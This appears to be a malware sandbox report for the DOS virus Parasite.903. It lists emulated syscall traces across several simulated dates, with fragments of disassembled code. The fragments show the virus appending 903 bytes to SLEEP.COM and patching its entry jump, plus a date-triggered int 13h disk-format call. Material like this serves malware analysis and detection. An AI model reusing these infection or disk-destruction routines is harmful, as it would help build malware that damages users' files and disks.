Sample viewer

vx.netlux.org/Virus.DOS.Parasite.903

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T23:03:43.054401509Z	47	PC: 12a79 \| Get disk transfer address
2018-12-17T23:03:43.056114469Z	26	PC: 12a5e \| Set disk transfer address
2018-12-17T23:03:43.060868562Z	42	PC: 12a88 \| Get date 0x12a88: cmp al, 1 0x12a8a: jge 0x12a8f 0x12a8c: jmp 0x12ada 0x12a8e: nop 0x12a8f: cmp al, 1 0x12a91: ja 0x12ada 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov dl, 2 0x12a98: mov ah, 5 0x12a9a: mov dh, 0x80 0x12a9c: mov ch, 0 0x12a9e: int 0x13 0x12aa0: mov cx, 0x14 0x12aa3: push cx 0x12aa4: call 0x12ab1 0x12aa7: mov cx, 0x4000 0x12aaa: loop 0x12aaa 0x12aac: pop cx 0x12aad: loop 0x12aa3

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14629,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:41:11.864251131Z	47	PC: 12a79 \| Get disk transfer address
2018-12-25T12:41:11.877673861Z	26	PC: 12a5e \| Set disk transfer address
2018-12-25T12:41:11.87983074Z	42	PC: 12a88 \| Get date 0x12a88: cmp al, 1 0x12a8a: jge 0x12a8f 0x12a8c: jmp 0x12ada 0x12a8e: nop 0x12a8f: cmp al, 1 0x12a91: ja 0x12ada 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov dl, 2 0x12a98: mov ah, 5 0x12a9a: mov dh, 0x80 0x12a9c: mov ch, 0 0x12a9e: int 0x13 0x12aa0: mov cx, 0x14 0x12aa3: push cx 0x12aa4: call 0x12ab1 0x12aa7: mov cx, 0x4000 0x12aaa: loop 0x12aaa 0x12aac: pop cx 0x12aad: loop 0x12aa3
2018-12-25T12:41:11.882547493Z	44	PC: 12ade \| Get time 0x12ade: and dh, 0xf 0x12ae1: cmp dh, 3 0x12ae4: jb 0x12aa0 0x12ae6: cmp dh, 3 0x12ae9: ja 0x12b15 0x12aeb: int 0x19 0x12aed: mov ah, 0x47 0x12aef: xor dl, dl 0x12af1: add si, 0 0x12af4: nop 0x12af5: int 0x21 0x12af7: jb 0x12b15 0x12af9: mov ah, 0x3b 0x12afb: mov dx, si 0x12afd: add dx, 0x40 0x12b00: nop 0x12b01: int 0x21 0x12b03: mov word ptr [bx + 0x44], di 0x12b06: nop 0x12b07: mov si, bx
2018-12-25T12:41:11.885311037Z	78	PC: 12b99 \| Find first file
2018-12-25T12:41:11.892739576Z	67	PC: 12bda \| Get or set file attributes
2018-12-25T12:41:11.899386031Z	67	PC: 12bec \| Get or set file attributes
2018-12-25T12:41:11.919076299Z	61	PC: 12bf7 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:11.928746006Z	87	PC: 12c03 \| Get or set file date and time
2018-12-25T12:41:11.930469393Z	44	PC: 12c0f \| Get time 0x12c0f: and dh, 7 0x12c12: jmp 0x12c15 0x12c14: nop 0x12c15: mov ah, 0x3f 0x12c17: mov cx, 3 0x12c1a: mov dx, 0x2a 0x12c1d: nop 0x12c1e: add dx, si 0x12c20: int 0x21 0x12c22: jb 0x12c7f 0x12c24: cmp ax, 3 0x12c27: jne 0x12c7f 0x12c29: mov ax, 0x4202 0x12c2c: mov cx, 0 0x12c2f: mov dx, 0 0x12c32: int 0x21 0x12c34: jb 0x12c7f 0x12c36: mov cx, ax 0x12c38: sub ax, 3 0x12c3b: mov word ptr [si + 0x2e], ax
2018-12-25T12:41:11.932887636Z	63	PC: 12c22 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:41:11.94152571Z	66	PC: 12c34 \| Move file pointer
2018-12-25T12:41:11.943192687Z	64	PC: 12c5e \| Write file or device (Write 903 bytes on handle 5)
2018-12-25T12:41:11.953114138Z	66	PC: 12c70 \| Move file pointer
2018-12-25T12:41:11.954819325Z	64	PC: 12c7f \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:41:11.962591768Z	87	PC: 12c92 \| Get or set file date and time
2018-12-25T12:41:11.964519068Z	62	PC: 12c96 \| Close file
2018-12-25T12:41:11.974421628Z	67	PC: 12ca5 \| Get or set file attributes
2018-12-25T12:41:11.981245994Z	26	PC: 12cb2 \| Set disk transfer address

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14629,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:41:12.925238378Z	47	PC: 12a79 \| Get disk transfer address
2018-12-25T12:41:12.926895267Z	26	PC: 12a5e \| Set disk transfer address
2018-12-25T12:41:12.928155489Z	42	PC: 12a88 \| Get date 0x12a88: cmp al, 1 0x12a8a: jge 0x12a8f 0x12a8c: jmp 0x12ada 0x12a8e: nop 0x12a8f: cmp al, 1 0x12a91: ja 0x12ada 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov dl, 2 0x12a98: mov ah, 5 0x12a9a: mov dh, 0x80 0x12a9c: mov ch, 0 0x12a9e: int 0x13 0x12aa0: mov cx, 0x14 0x12aa3: push cx 0x12aa4: call 0x12ab1 0x12aa7: mov cx, 0x4000 0x12aaa: loop 0x12aaa 0x12aac: pop cx 0x12aad: loop 0x12aa3
2018-12-25T12:41:12.930502695Z	44	PC: 12ade \| Get time 0x12ade: and dh, 0xf 0x12ae1: cmp dh, 3 0x12ae4: jb 0x12aa0 0x12ae6: cmp dh, 3 0x12ae9: ja 0x12b15 0x12aeb: int 0x19 0x12aed: mov ah, 0x47 0x12aef: xor dl, dl 0x12af1: add si, 0 0x12af4: nop 0x12af5: int 0x21 0x12af7: jb 0x12b15 0x12af9: mov ah, 0x3b 0x12afb: mov dx, si 0x12afd: add dx, 0x40 0x12b00: nop 0x12b01: int 0x21 0x12b03: mov word ptr [bx + 0x44], di 0x12b06: nop 0x12b07: mov si, bx
2018-12-25T12:41:12.933373784Z	78	PC: 12b99 \| Find first file
2018-12-25T12:41:12.940354678Z	67	PC: 12bda \| Get or set file attributes
2018-12-25T12:41:12.9463609Z	67	PC: 12bec \| Get or set file attributes
2018-12-25T12:41:12.969266257Z	61	PC: 12bf7 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:12.977380498Z	87	PC: 12c03 \| Get or set file date and time
2018-12-25T12:41:12.978940011Z	44	PC: 12c0f \| Get time 0x12c0f: and dh, 7 0x12c12: jmp 0x12c15 0x12c14: nop 0x12c15: mov ah, 0x3f 0x12c17: mov cx, 3 0x12c1a: mov dx, 0x2a 0x12c1d: nop 0x12c1e: add dx, si 0x12c20: int 0x21 0x12c22: jb 0x12c7f 0x12c24: cmp ax, 3 0x12c27: jne 0x12c7f 0x12c29: mov ax, 0x4202 0x12c2c: mov cx, 0 0x12c2f: mov dx, 0 0x12c32: int 0x21 0x12c34: jb 0x12c7f 0x12c36: mov cx, ax 0x12c38: sub ax, 3 0x12c3b: mov word ptr [si + 0x2e], ax
2018-12-25T12:41:12.981393376Z	63	PC: 12c22 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:41:12.989950302Z	66	PC: 12c34 \| Move file pointer
2018-12-25T12:41:12.9916824Z	64	PC: 12c5e \| Write file or device (Write 903 bytes on handle 5)
2018-12-25T12:41:13.001255901Z	66	PC: 12c70 \| Move file pointer
2018-12-25T12:41:13.003997507Z	64	PC: 12c7f \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:41:13.011666046Z	87	PC: 12c92 \| Get or set file date and time
2018-12-25T12:41:13.013476498Z	62	PC: 12c96 \| Close file
2018-12-25T12:41:13.023022614Z	67	PC: 12ca5 \| Get or set file attributes
2018-12-25T12:41:13.034033145Z	26	PC: 12cb2 \| Set disk transfer address

{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14629,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:41:14.03049998Z	47	PC: 12a79 \| Get disk transfer address
2018-12-25T12:41:14.03212489Z	26	PC: 12a5e \| Set disk transfer address
2018-12-25T12:41:14.033353766Z	42	PC: 12a88 \| Get date 0x12a88: cmp al, 1 0x12a8a: jge 0x12a8f 0x12a8c: jmp 0x12ada 0x12a8e: nop 0x12a8f: cmp al, 1 0x12a91: ja 0x12ada 0x12a93: jmp 0x12a96 0x12a95: nop 0x12a96: mov dl, 2 0x12a98: mov ah, 5 0x12a9a: mov dh, 0x80 0x12a9c: mov ch, 0 0x12a9e: int 0x13 0x12aa0: mov cx, 0x14 0x12aa3: push cx 0x12aa4: call 0x12ab1 0x12aa7: mov cx, 0x4000 0x12aaa: loop 0x12aaa 0x12aac: pop cx 0x12aad: loop 0x12aa3